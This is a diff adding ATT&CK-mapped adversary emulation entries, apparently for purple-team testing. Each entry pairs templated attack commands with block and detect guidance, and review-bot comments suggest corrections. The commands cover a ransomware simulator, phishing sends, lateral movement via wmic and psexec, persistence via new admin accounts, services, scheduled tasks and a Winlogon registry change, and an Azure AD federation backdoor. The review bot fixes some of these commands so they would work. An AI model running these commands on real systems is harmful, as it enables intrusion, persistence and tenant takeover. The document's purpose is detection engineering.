+- Suspicious Volume Shadow Service use detected in the SIEM using telemetry
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4
+ tid: T1490
+ tactic: TA0040
+ x_vectr_id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4
+ isv: 1
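Review bot: In the vssadmin hunk, `Suspicious Volume Shadow Service use detected in the SIEM using telemetry` does not say which telemetry; the command line in the guidance is the concrete indicator and is what a rule should match. Suggest `- Process creation events (Event ID 4688 with command-line auditing, or Sysmon Event ID 1) where vssadmin.exe is invoked with delete shadows, which has no routine use on workstations`. The guidance uses `CMD>` while neighbouring entries in this commit use `cmd>`; settling on one form would help anyone grepping the index for commands.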
diff --git a/rh-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml b/rh-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml
new file mode 100644
index 0000000..4e63384
--- /dev/null
+++ b/rh-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml
@@ -0,0 +1,16 @@
+name: Modify group policy object
+description: Modify a domain group policy object. This can be used for activities like persisting access to the environment, disabling security controls, and executing ransomware on domain systems.
+platforms:
+guidance:
+block:
+- ''
+detect:
+- Configure auditing on group policy objects then look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes
+controls:
+- SIEM
+metadata:
+ id: 45591791-541b-4a27-bda9-75e6d78a66f4
+ tid: T1484.001
+ tactic: TA0005
+ x_vectr_id: 45591791-541b-4a27-bda9-75e6d78a66f4
+ isv: 1
diff --git a/rh-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml b/rh-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml
new file mode 100644
index 0000000..f6c2e88
--- /dev/null
+++ b/rh-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml
@@ -0,0 +1,20 @@
+name: Encrypt a large amount of files
+description: Encrypt a large amount of files on the endpoint to simulate ransomware
+platforms:
+guidance:
+- cmd> coldcryptor.exe run {{ extension }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Detect common ransomware extensions using file system telemetry
+controls:
+- Endpoint Protection
+metadata:
+ id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+ tid: T1486
+ tactic: TA0040
+ x_tools:
+ - https://github.com/2XXE-SRA/payload_resources/tree/master/coldencryptor
+ x_vectr_id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+ isv: 1
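Review bot: In the GPO hunk, `Configure auditing on group policy objects` leaves out what the resulting events are; GPO edits are directory-object modifications, logged as Event ID 5136 (object modified) and 5137 (object created) on groupPolicyContainer objects once Directory Service Changes auditing is enabled, and that is what a SIEM rule keys on. Suggest appending `(Event ID 5136/5137 on groupPolicyContainer objects)` to that detect line, and `occuring` should read `occurring`. The file sits under Impact while `tactic: TA0005` is Defense Evasion; one of the two is presumably unintended, and the block list is empty even though restricting GPO edit rights to a small administrative group is a standard mitigation for T1484.001.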
diff --git a/rh-index-2024/techniques/InitialAccess/1f9d5363-ddf4-41c3-8bc3-f80595219206.yml b/rh-index-2024/techniques/InitialAccess/1f9d5363-ddf4-41c3-8bc3-f80595219206.yml
new file mode 100644
index 0000000..b95efea
--- /dev/null
+++ b/rh-index-2024/techniques/InitialAccess/1f9d5363-ddf4-41c3-8bc3-f80595219206.yml
@@ -0,0 +1,16 @@
+name: Suspicious service use
+description: Interact with a service from an unexpected geolocation and with an unexpected user-agent to simulate suspicious use of the target service. This can occur, for example, when a user's token is stolen via a phishing attack then used by an attacker to assume their session and access a service.
+platforms:
+guidance:
+block:
+- ''
+detect:
+- Baseline application use for users using application logs then generate alerts for instances where the usage occurs from comparatively anomalous geolocations
+controls:
+- SIEM
+metadata:
+ id: 1f9d5363-ddf4-41c3-8bc3-f80595219206
+ tid: T1078
+ tactic: TA0001
+ x_vectr_id: 1f9d5363-ddf4-41c3-8bc3-f80595219206
+ isv: 1
diff --git a/rh-index-2024/techniques/InitialAccess/609515fe-24e0-4bc2-a069-a3d815e68ec2.yml b/rh-index-2024/techniques/InitialAccess/609515fe-24e0-4bc2-a069-a3d815e68ec2.yml
new file mode 100644
index 0000000..7e31368
--- /dev/null
+++ b/rh-index-2024/techniques/InitialAccess/609515fe-24e0-4bc2-a069-a3d815e68ec2.yml
@@ -0,0 +1,17 @@
+name: Suspicious external employee login
+description: Login to an external employee portal from an unexpected geolocation and with an unexpected user-agent to simulate a suspicious login attempt.
+platforms:
+guidance:
+block:
+- Suspicious logins originating from select geolocations are blocked
+detect:
+- Baseline login events for users using authentication logs then generate alerts for instances where the logins occur from comparatively anomalous geolocations
+controls:
+- SIEM
+- IdP
+metadata:
+ id: 609515fe-24e0-4bc2-a069-a3d815e68ec2
+ tid: T1078
+ tactic: TA0001
+ x_vectr_id: 609515fe-24e0-4bc2-a069-a3d815e68ec2
+ isv: 1
diff --git a/rh-index-2024/techniques/InitialAccess/97f1da56-79a3-4181-a491-8de9f93b05af.yml b/rh-index-2024/techniques/InitialAccess/97f1da56-79a3-4181-a491-8de9f93b05af.yml
new file mode 100644
index 0000000..a4d1696
--- /dev/null
+++ b/rh-index-2024/techniques/InitialAccess/97f1da56-79a3-4181-a491-8de9f93b05af.yml
@@ -0,0 +1,17 @@
+name: Attachment - Zipped macro
+description: Send a malicious macro-enabled Office document in a ZIP archive to a target user in an email.
+platforms:
+guidance:
+- PS> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ noreply@maildomain }} -Attachments {{ attachment }}
+block:
+- Malicious email blocked/quarantined or attachment inside email stripped by email gateway
+detect:
+- Malicious email alerted on by email gateway
+controls:
+- Mail Gateway
+metadata:
+ id: 97f1da56-79a3-4181-a491-8de9f93b05af
+ tid: T1566.001
+ tactic: TA0001
+ x_vectr_id: 97f1da56-79a3-4181-a491-8de9f93b05af
+ isv: 1
diff --git a/rh-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml b/rh-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml
new file mode 100644
index 0000000..daf292b
--- /dev/null
+++ b/rh-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml
@@ -0,0 +1,16 @@
+name: Prompt a user with multiple MFA requests
+description: Using valid credentials for a user, prompt that user with multiple MFA requests in a short period of time in order to induce them to accept the prompt.
+platforms:
+guidance:
+block:
+- Prevent sign-ins from users with anomalous login characteristics, such as an unknown geolocation or device fingerprint
+detect:
+- Baseline MFA requests for users using authentication logs then generate alerts for instances where the amount of MFA requests for a user significantly exceeds the baseline within a short time period (e.g. <1 hour).
+controls:
+- IdP
+metadata:
+ id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+ tid: T1621
+ tactic: TA0006
+ x_vectr_id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+ isv: 1
diff --git a/rh-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml b/rh-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml
new file mode 100644
index 0000000..1eae23d
--- /dev/null
+++ b/rh-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml
@@ -0,0 +1,17 @@
+name: Attachment - ISO
+description: Send phishing email to victim containing an ISO attachment. ISO files can be used to bypass mark-of-the-web restrictions.
+platforms:
+guidance:
+- PS> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ noreply@maildomain }} -Attachments {{ attachment }}
+block:
+- Malicious email blocked/quarantined or link inside email rewritten/stripped by email gateway
+detect:
+- Malicious email alerted on by email gateway
+controls:
+- Mail Gateway
+metadata:
+ id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+ tid: T1566.001
+ tactic: TA0001
+ x_vectr_id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+ isv: 1
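Review bot: In the MFA-prompt hunk the block entry addresses anomalous sign-in characteristics but not the prompt itself; number matching, or any MFA method that requires the user to enter a value shown on the sign-in screen, removes the one-tap approval this technique depends on and is the control most directly tied to T1621. Suggest adding `- MFA uses number matching or a phishing-resistant method so that a push prompt cannot be approved without information from the sign-in screen`, with Hardening added to controls. The file is under InitialAccess while `tactic: TA0006` is Credential Access, which is where ATT&CK places T1621; the folder placement may be worth reconciling.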
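Review bot: In the "Attachment - ISO" hunk the block line says `link inside email rewritten/stripped`, but this technique sends an ISO attachment and contains no link; the sibling `Attachment - Zipped macro` entry in this commit uses `attachment inside email stripped by email gateway`, which is the wording that applies here. A second block line is also warranted given the description's point about mark-of-the-web: `- Mounting of ISO/IMG files delivered as mail attachments is blocked by policy, or the gateway strips disk-image attachments`. The `{{ noreply@maildomain }}` placeholder in the guidance reads as a literal address rather than a template variable name, unlike every other placeholder in this commit.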
diff --git a/rh-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml b/rh-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml
new file mode 100644
index 0000000..775b96d
--- /dev/null
+++ b/rh-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml
@@ -0,0 +1,20 @@
+name: Lateral Movement via RDP
+description: Perform an interactive logons to a Windows system via RDP
+platforms:
+- windows
+guidance:
+- CMD> mstsc /v:{{ target }}
+block:
+- Host-based firewalls prevent direct communications over common ports/protocols
+detect:
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- SIEM
+- Identity Threat Protection
+- Hardening
+metadata:
+ id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61
+ tid: T1021.001
+ tactic: TA0008
+ x_vectr_id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61
+ isv: 1
diff --git a/rh-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml b/rh-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml
new file mode 100644
index 0000000..807596c
--- /dev/null
+++ b/rh-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml
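Review bot: The RDP detect entry cites Event ID 4624 without the qualifier that separates RDP from every other logon; interactive RDP sessions carry LogonType 10, and filtering on it keeps the baseline from being swamped by network logons. Suggest `(Event ID 4624 with LogonType 10, 4648)` in place of `(Event ID 4624, 4648)`. `Perform an interactive logons` in the description should read `Perform an interactive logon`.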
@@ -0,0 +1,23 @@
+name: Lateral Movement via WMI
+description: Move to another system by using Windows Management Instrumentation (WMI) to spawn a process on that target system
+platforms:
+- windows
+guidance:
+- CMD> wmic /node:"{{ target }}" process call create "{{ command }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Host-based firewalls prevent direct communications over common ports/protocols
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- Endpoint Protection
+- SIEM
+- Identity Threat Protection
+- Hardening
+metadata:
+ id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79
+ tid: T1021.003
+ tactic: TA0008
+ x_vectr_id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79
+ isv: 1
diff --git a/rh-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml b/rh-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml
new file mode 100644
index 0000000..508dc52
--- /dev/null
+++ b/rh-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml
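Review bot: Neither detect entry captures what is specific to WMI-based execution on the target: the new process is spawned by WmiPrvSE.exe, a stable parent-child relationship that does not depend on an authentication baseline. Suggest adding `- Process creation events on the target where the parent process is WmiPrvSE.exe and the child is a shell or other non-WMI binary`. The authentication-event line is shared verbatim with the RDP, PsExec and remote-copy entries in this commit, so any wording change should be applied to all four together.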
@@ -0,0 +1,24 @@
+name: Lateral Movement via PsExec
+description: Move to another system by creating a service remotely via Sysinternals PsExec
+platforms:
+- windows
+guidance:
+- CMD> psexec -s \{{ target }} {{ command }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Host-based firewalls prevent direct communications over common ports/protocols
+- Remote access to the service control manager is blocked by a DACL, preventing service creation by remote users
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- Endpoint Protection
+- SIEM
+- Identity Threat Protection
+- Hardening
+metadata:
+ id: 9b5396f2-6e4a-498a-995e-47e48a99bf76
+ tid: T1021.002
+ tactic: TA0008
+ x_vectr_id: 9b5396f2-6e4a-498a-995e-47e48a99bf76
+ isv: 1
diff --git a/rh-index-2024/techniques/LateralMovement/b74ff4c5-eebf-466b-af85-341b19c4c748.yml b/rh-index-2024/techniques/LateralMovement/b74ff4c5-eebf-466b-af85-341b19c4c748.yml
new file mode 100644
index 0000000..c373b4f
--- /dev/null
+++ b/rh-index-2024/techniques/LateralMovement/b74ff4c5-eebf-466b-af85-341b19c4c748.yml
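Review bot: The guidance `psexec -s \{{ target }} {{ command }}` has a single backslash before the target, whereas PsExec takes a UNC-style `\\computer` and the remote-copy entry in this same commit writes `\\{{ target }}`; as written the rendered command would be malformed. Suggest `- CMD> psexec -s \\{{ target }} {{ command }}`. For detect, PsExec's defining artifact is the service it installs on the target, so `- Service installation events on the target (Event ID 7045 in the System log, 4697 in the Security log) for a service whose binary is PSEXESVC.exe or an unfamiliar name` is a stronger signal than the shared authentication-baseline line and pairs with the SCM DACL entry already under block.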
@@ -0,0 +1,20 @@
+name: Remote .exe copy
+description: Copy an .exe payload to a temp folder on the remote target
+platforms:
+guidance:
+- cmd> copy {{ exe }} \\{{ target }}\{{ share }}\{{ path }}
+block:
+- Host-based firewalls prevent direct communications over common ports/protocols
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- Endpoint Protection
+- Antivirus
+- SIEM
+metadata:
+ id: b74ff4c5-eebf-466b-af85-341b19c4c748
+ tid: T1570
+ tactic: TA0008
+ x_vectr_id: b74ff4c5-eebf-466b-af85-341b19c4c748
+ isv: 1
diff --git a/rh-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml b/rh-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml
new file mode 100644
index 0000000..a58486f
--- /dev/null
+++ b/rh-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml
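Review bot: `Antivirus` in controls is inconsistent with the `Endpoint Protection` label every other entry in this commit uses, and the detect list has no share-level telemetry even though the guidance writes to `\\{{ target }}\{{ share }}`. Suggest adding `- File share access events on the target (Event ID 5140/5145, requires File Share auditing) showing a write to an administrative share from a host that does not normally do so`. `platforms:` is empty while the guidance is a Windows `copy` to a UNC path, so `- windows` is presumably intended.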
@@ -0,0 +1,23 @@
+name: Register a new device in Azure AD
+description: Register a new device in Azure AD
+platforms:
+- azuread
+guidance:
+- PS> Join-AADIntDeviceToAurzeAD -DeviceName {{ name }} -DeviceType "purple" -OSVersion "1"
+block:
+- 'Prevent users outside of approved groups from being able to register new devices in the tenant. Refer to documentation for details: https://learn.microsoft.com/en-us/azure/active-directory/devices/device-management-azure-portal#configure-device-settings'
+detect:
+- Detect anomalous device registration events by using Azure audit logs
+controls:
+- SIEM
+- Hardening
+metadata:
+ id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96
+ tid: T1098.005
+ tactic: TA0003
+ x_tools:
+ - AADInternals
+ x_references:
+ - htpts://aadinternals.nom/post/prt/
+ x_vectr_id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96
+ isv: 1
diff --git a/rh-index-2024/techniques/Persistence/0bcb2080-b140-4a1c-9e79-8512a18882d8.yml b/rh-index-2024/techniques/Persistence/0bcb2080-b140-4a1c-9e79-8512a18882d8.yml
new file mode 100644
index 0000000..6a86c5e
--- /dev/null
+++ b/rh-index-2024/techniques/Persistence/0bcb2080-b140-4a1c-9e79-8512a18882d8.yml
@@ -0,0 +1,21 @@
+name: Persist via new local administrator
+description: Create a new local user then add them to the "Administrators" group using the builtin net.exe
+platforms:
+- windows
+guidance:
+- CMD> net user /add {{ username }} {{ password }}
+- CMD> net localgroup administrators {{ username }} /add
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use group modification events (Event ID 4728) to identify additions to local security groups.
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 0bcb2080-b140-4a1c-9e79-8512a18882d8
+ tid: T1136.001
+ tactic: TA0003
+ x_vectr_id: 0bcb2080-b140-4a1c-9e79-8512a18882d8
+ isv: 1
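Review bot: The guidance cmdlet `Join-AADIntDeviceToAurzeAD` is misspelled — the AADInternals cmdlet is `Join-AADIntDeviceToAzureAD` — so the line as written will not run, and the reference `htpts://aadinternals.nom/post/prt/` has a broken scheme and TLD (presumably `https://aadinternals.com/post/prt/`). The block bullet would be more useful naming the actual tenant setting the linked page describes (the "Users may register their devices" device setting, restricted to selected groups or none) rather than only pointing at the documentation. The detect bullet is similarly generic; stating which Azure AD audit-log activity to baseline and that registrations from principals, IPs or device types not seen before are the anomaly of interest would make it actionable, and the distinctive `-DeviceType "purple" -OSVersion "1"` values are a convenient marker for finding the emulation in those logs.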
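Review bot: The detect bullet cites Event ID 4728, which is logged for additions to security-enabled global groups; the guidance adds the user to the local Administrators group, which produces Event ID 4732 (member added to a security-enabled local group), so the bullet should read `- Use group modification events (Event ID 4732) to identify additions to local security groups.` The account creation on the first guidance line is separately logged as Event ID 4720 and is worth its own bullet, since the creation alone is a signal even when the group addition is missed. As the `net user /add` line puts the password on the command line, a short caveat to use a throwaway value would help operators avoid leaking a real credential into process telemetry.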
diff --git a/rh-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml b/rh-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml
new file mode 100644
index 0000000..cd00901
--- /dev/null
+++ b/rh-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml
@@ -0,0 +1,20 @@
+name: Persist via new scheduled task
+description: Persist on a system by creating a new scheduled task
+platforms:
+- windows
+guidance:
+- cmd> schtasks.exe /create /sc daily /tn {{ task_name }} /tr {{ command }} /st 20:00
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use scheduled task creation events (Event ID 4698) to identify newly created scheduled tasks. Look specifically for events that are anomalous as compared to other task creation events in the environment, such as events where the command is unique across all other tasks and events created by principals that do not commonly create tasks.
+controls:
+- SIEM
+- Endpoint Protection
+metadata:
+ id: 20a6dace-d801-42f5-b659-6cf91e39d273
+ tid: T1053.005
+ tactic: TA0003
+ x_vectr_id: 20a6dace-d801-42f5-b659-6cf91e39d273
+ isv: 1
diff --git a/rh-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml b/rh-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml
new file mode 100644
index 0000000..d43b8c9
--- /dev/null
+++ b/rh-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml
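Review bot: Event ID 4698 is only written when the "Audit Other Object Access Events" subcategory is enabled, which is not the default, and the detect bullet does not say so — unlike the Winlogon entry in this commit, which tells the reader to enable object auditing first. Suggest prefixing the bullet: `- Enable the "Audit Other Object Access Events" subcategory via Advanced Audit Policy, then use scheduled task creation events (Event ID 4698) ...`. The Microsoft-Windows-TaskScheduler/Operational log (event 106, task registered) is an alternative source that does not depend on Security-log audit policy, though it may itself need enabling on some builds, and is worth mentioning as a fallback.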
@@ -0,0 +1,20 @@
+name: Persist via new Windows service
+description: Persist on a system by creating a new service
+platforms:
+- windows
+guidance:
+- CMD> sc create {{ service_name }} binPath= "{{ command }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Use services creation events (Event ID 4697) to identify newly created services. Look specifically for events that are anomalous as compared to other service creation events in the environment, such as events where the command is unique across all other services and events created by principals that do not commonly create services.
+controls:
+- SIEM
+- Endpoint Protection
+metadata:
+ id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737
+ tid: T1543.003
+ tactic: TA0003
+ x_vectr_id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737
+ isv: 1
diff --git a/rh-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml b/rh-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml
new file mode 100644
index 0000000..a323aaa
--- /dev/null
+++ b/rh-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml
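Review bot: Event ID 4697 depends on the "Audit Security System Extension" subcategory being enabled, which the detect bullet does not mention; the System log's Event ID 7045 (a service was installed) is written regardless of Security audit policy and is the source most environments actually have, so the bullet should name both: `- Use service installation events (Security Event ID 4697 when "Audit Security System Extension" is enabled, or System Event ID 7045) to identify newly created services. ...`. The guidance creates the service but never starts it, so the description should say whether the test expects execution at next boot or a follow-up `sc start`, since the detection story differs. Minor wording: `services creation events` should be `service creation events`, matching the scheduled-task entry.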
@@ -0,0 +1,20 @@
+name: Persist via Registry Winlogon Shell
+description: Run a payload during user login by setting a Registry Winlogon key
+platforms:
+- windows
+guidance:
+- CMD> reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /f "{{ command }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622
+ tid: T1547.004
+ tactic: TA0003
+ x_vectr_id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622
+ isv: 1
diff --git a/rh-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml b/rh-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml
new file mode 100644
index 0000000..0a122f8
--- /dev/null
+++ b/rh-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml
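Review bot: The guidance line passes the payload as a bare trailing argument after `/f`; `reg add` takes value data through `/d`, so as written the command should fail with a syntax error rather than set Shell. It should read `- CMD> reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe, {{ command }}" /f`, keeping `explorer.exe` first because this HKLM value replaces the shell for every user on the host and dropping it leaves logons without a desktop. On detection, Event ID 4656 records a handle request and not a successful write; Event ID 4657 (registry value modified) is what confirms the change, and the bullet should say the SACL must cover the Winlogon key specifically. The phrase `when modification are made the Registry` also needs fixing to `when modifications are made to the Registry`.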
@@ -0,0 +1,23 @@
+name: Configure a custom federated domain
+description: Convert a custom domain in the Azure Active Directory tenant into a federated domain. This can be used for persistent access into the tenant.
+platforms:
+- azuread
+guidance:
+- PS> ConvertTo-AADIntBackdoor -AccessToken {{ access_token }} -DomainName "{{ domain }}"
+block:
+- ''
+detect:
+- Monitor for unusual domain federation via the SEIM. Examine AAD logs for actions that "Set domain authentication" to "federated".
+- https://www.inversecos.com/2021/11/how-to-detect-azure-active-directory.html
+controls:
+- SIEM
+metadata:
+ id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1
+ tid: T1484.002
+ tactic: TA0003
+ x_tools:
+ - AADInternals
+ x_references:
+ - https://o365blog.com/post/aadbackdoor/
+ x_vectr_id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1
+ isv: 1
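Review bot: `block:` holds a single empty string (`- ''`), which reads as an unfilled placeholder rather than a deliberate "no preventive control"; either drop the entry or state the real mitigation, e.g. `- Restrict membership of the directory roles able to change domain authentication settings (Global Administrator and the domain-management role; confirm against current Microsoft docs) and protect them with PIM and phishing-resistant MFA`. The detect bullet misspells SIEM as `SEIM`, and the bare URL placed as a second detect item would sit better under `x_references` beside the existing o365blog link, matching how the device-registration entry handles references. Since the guidance takes a raw `-AccessToken`, the description should note that the token must belong to a principal privileged enough to modify federation settings, so operators know what they need to obtain before running the test.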